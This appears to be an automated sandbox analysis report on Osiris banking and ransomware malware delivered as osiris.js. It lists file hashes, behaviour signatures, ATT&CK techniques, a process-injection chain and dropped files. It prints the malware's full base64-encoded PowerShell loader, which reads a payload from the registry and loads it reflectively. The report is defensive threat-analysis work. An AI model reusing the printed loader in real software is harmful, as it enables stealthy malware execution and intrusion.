osiris | 20d1df07b4e17ee0821043733106bd179a520acd9ec307bdb1703df17cbf6ee7

General

Target

osiris.js
Size

2.5MB
MD5

e00ccaf47b31887d18ccc6d80aaa2a39
SHA1

60b574bcda0024cf90ec3f7e97db28c58cc79552
SHA256

20d1df07b4e17ee0821043733106bd179a520acd9ec307bdb1703df17cbf6ee7
SHA512

5c3181b5440ac31079c8651d752ad890d84b5ee692b37168866e8c0bef1abfcc8d77311c5df7a7e0e72ad33c9ab999e4b096a199c832e42778565be2ede9c4c6

Score

10^/10

osiris banker botnet ransomware

Malware Config

Signatures

Osiris
banker botnet osiris
Executes dropped EXE 1 IoCs

Processes:

GetX64BTIT.exe

pid process

2032 GetX64BTIT.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 api.ipify.org
19 api.ipify.org
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Connection Proxy
T1090
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3608 set thread context of 4036 3608 powershell.exe ImagingDevices.exe

pid	process
2032	GetX64BTIT.exe

flow	ioc
18	api.ipify.org
19	api.ipify.org

description	pid	process	target process
PID 3608 set thread context of 4036	3608	powershell.exe	ImagingDevices.exe

Suspicious behavior: EnumeratesProcesses 6833 IoCs

Processes:

powershell.exeImagingDevices.exe

pid	process
3608	powershell.exe
3608	powershell.exe
3608	powershell.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe
4036	ImagingDevices.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3608 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ImagingDevices.exe

pid process

4036 ImagingDevices.exe

description	pid	process
Token: SeDebugPrivilege	3608	powershell.exe

pid	process
4036	ImagingDevices.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

wscript.execmd.exepowershell.exeImagingDevices.exe

description	pid	process	target process
PID 3084 wrote to memory of 2940	3084	wscript.exe	cmd.exe
PID 3084 wrote to memory of 2940	3084	wscript.exe	cmd.exe
PID 2940 wrote to memory of 3608	2940	cmd.exe	powershell.exe
PID 2940 wrote to memory of 3608	2940	cmd.exe	powershell.exe
PID 2940 wrote to memory of 3608	2940	cmd.exe	powershell.exe
PID 3608 wrote to memory of 4036	3608	powershell.exe	ImagingDevices.exe
PID 3608 wrote to memory of 4036	3608	powershell.exe	ImagingDevices.exe
PID 3608 wrote to memory of 4036	3608	powershell.exe	ImagingDevices.exe
PID 3608 wrote to memory of 4036	3608	powershell.exe	ImagingDevices.exe
PID 3608 wrote to memory of 4036	3608	powershell.exe	ImagingDevices.exe
PID 3608 wrote to memory of 4036	3608	powershell.exe	ImagingDevices.exe
PID 3608 wrote to memory of 4036	3608	powershell.exe	ImagingDevices.exe
PID 3608 wrote to memory of 4036	3608	powershell.exe	ImagingDevices.exe
PID 3608 wrote to memory of 4036	3608	powershell.exe	ImagingDevices.exe
PID 3608 wrote to memory of 4036	3608	powershell.exe	ImagingDevices.exe
PID 4036 wrote to memory of 2032	4036	ImagingDevices.exe	GetX64BTIT.exe
PID 4036 wrote to memory of 2032	4036	ImagingDevices.exe	GetX64BTIT.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js
1⤵
- Suspicious use of WriteProcessMemory
PID:3084

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAegBnAGIAbQBnAHMAdgBpACAAIwA+ACQAdQA9ACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAANwAwADAAOwAkAGkAKwArACkAewAkAGMAPQAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcACIAKwAkAHUAKwAiADEAIgA7AFQAcgB5AHsAJABhAD0AJABhACsAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAJABjACkALgAkAGkAfQBDAGEAdABjAGgAewB9AH0AOwBmAHUAbgBjAHQAaQBvAG4AIABjAGgAYgBhAHsAWwBjAG0AZABsAGUAdABiAGkAbgBkAGkAbgBnACgAKQBdAHAAYQByAGEAbQAoAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQApAF0AWwBTAHQAcgBpAG4AZwBdACQAaABzACkAOwAkAEIAeQB0AGUAcwAgAD0AIABbAGIAeQB0AGUAWwBdAF0AOgA6AG4AZQB3ACgAJABoAHMALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkAOwBmAG8AcgAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABoAHMALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkAewAkAEIAeQB0AGUAcwBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAGgAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAH0AJABCAHkAdABlAHMAfQA7ACQAaQAgAD0AIAAwADsAVwBoAGkAbABlACAAKAAkAFQAcgB1AGUAKQB7ACQAaQArACsAOwAkAGsAbwAgAD0AIABbAG0AYQB0AGgAXQA6ADoAUwBxAHIAdAAoACQAaQApADsAaQBmACAAKAAkAGsAbwAgAC0AZQBxACAAMQAwADAAMAApAHsAIABiAHIAZQBhAGsAfQB9AFsAYgB5AHQAZQBbAF0AXQAkAGIAIAA9ACAAYwBoAGIAYQAoACQAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAKQA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABiACkAOwBbAE0AbwBkAGUAXQA6ADoAUwBlAHQAdQBwACgAKQA7AA== "
2⤵
- Suspicious use of WriteProcessMemory
PID:2940

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAegBnAGIAbQBnAHMAdgBpACAAIwA+ACQAdQA9ACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAANwAwADAAOwAkAGkAKwArACkAewAkAGMAPQAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcACIAKwAkAHUAKwAiADEAIgA7AFQAcgB5AHsAJABhAD0AJABhACsAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAJABjACkALgAkAGkAfQBDAGEAdABjAGgAewB9AH0AOwBmAHUAbgBjAHQAaQBvAG4AIABjAGgAYgBhAHsAWwBjAG0AZABsAGUAdABiAGkAbgBkAGkAbgBnACgAKQBdAHAAYQByAGEAbQAoAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQApAF0AWwBTAHQAcgBpAG4AZwBdACQAaABzACkAOwAkAEIAeQB0AGUAcwAgAD0AIABbAGIAeQB0AGUAWwBdAF0AOgA6AG4AZQB3ACgAJABoAHMALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkAOwBmAG8AcgAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABoAHMALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkAewAkAEIAeQB0AGUAcwBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAGgAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAH0AJABCAHkAdABlAHMAfQA7ACQAaQAgAD0AIAAwADsAVwBoAGkAbABlACAAKAAkAFQAcgB1AGUAKQB7ACQAaQArACsAOwAkAGsAbwAgAD0AIABbAG0AYQB0AGgAXQA6ADoAUwBxAHIAdAAoACQAaQApADsAaQBmACAAKAAkAGsAbwAgAC0AZQBxACAAMQAwADAAMAApAHsAIABiAHIAZQBhAGsAfQB9AFsAYgB5AHQAZQBbAF0AXQAkAGIAIAA9ACAAYwBoAGIAYQAoACQAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAKQA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABiACkAOwBbAE0AbwBkAGUAXQA6ADoAUwBlAHQAdQBwACgAKQA7AA== "
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3608

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4036

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
5⤵
- Executes dropped EXE
PID:2032

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Connection Proxy

1

T1090

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64btit.txt
MD5
ff4e76059fa0559cc4179b2a521c3c18

SHA1
cfbcb5827fd9a82d38efd0d395170547360f8557

SHA256
075ba1e2ad5eb30119593fd1125cdeb8e7b17451ac771de128689dc86d00d509

SHA512
0e406f7e1b6dc021c16379bef6c2f19cd0a60e56083704851e5b661d72420d617cd75d1a0d77edf7e4aa2055e78faf5b0b2ad82259623634149fef8b3b43bcde

Download Submit
memory/2032-28-0x0000000000000000-mapping.dmp

Download
memory/2940-3-0x0000000000000000-mapping.dmp

Download
memory/3608-17-0x0000000008FC0000-0x0000000008FC1000-memory.dmp

Filesize
4KB

Download
memory/3608-19-0x0000000008F20000-0x0000000008F21000-memory.dmp

Filesize
4KB

Download
memory/3608-10-0x0000000006DC0000-0x0000000006DC1000-memory.dmp

Filesize
4KB

Download
memory/3608-11-0x00000000075B0000-0x00000000075B1000-memory.dmp

Filesize
4KB

Download
memory/3608-12-0x0000000007620000-0x0000000007621000-memory.dmp

Filesize
4KB

Download
memory/3608-13-0x0000000007870000-0x0000000007871000-memory.dmp

Filesize
4KB

Download
memory/3608-14-0x00000000076E0000-0x00000000076E1000-memory.dmp

Filesize
4KB

Download
memory/3608-15-0x0000000008160000-0x0000000008161000-memory.dmp

Filesize
4KB

Download
memory/3608-16-0x0000000007F90000-0x0000000007F91000-memory.dmp

Filesize
4KB

Download
memory/3608-7-0x0000000004890000-0x0000000004891000-memory.dmp

Filesize
4KB

Download
memory/3608-18-0x0000000008CC0000-0x0000000008CC1000-memory.dmp

Filesize
4KB

Download
memory/3608-9-0x0000000006F80000-0x0000000006F81000-memory.dmp

Filesize
4KB

Download
memory/3608-20-0x0000000009560000-0x0000000009561000-memory.dmp

Filesize
4KB

Download
memory/3608-21-0x0000000008FB0000-0x0000000008FB2000-memory.dmp

Filesize
8KB

Download
memory/3608-22-0x0000000009190000-0x00000000092DC000-memory.dmp

Filesize
1.3MB

Download
memory/3608-4-0x0000000000000000-mapping.dmp

Download
memory/3608-5-0x00000000739C0000-0x00000000740AE000-memory.dmp

Filesize
6.9MB

Download
memory/3608-6-0x0000000004790000-0x0000000004791000-memory.dmp

Filesize
4KB

Download
memory/3608-27-0x0000000004893000-0x0000000004894000-memory.dmp

Filesize
4KB

Download
memory/3608-8-0x0000000004892000-0x0000000004893000-memory.dmp

Filesize
4KB

Download
memory/4036-25-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/4036-26-0x0000000002E00000-0x0000000002E9F000-memory.dmp

Filesize
636KB

Download
memory/4036-24-0x0000000000401698-mapping.dmp

Download
memory/4036-23-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download

Analysis

Sharing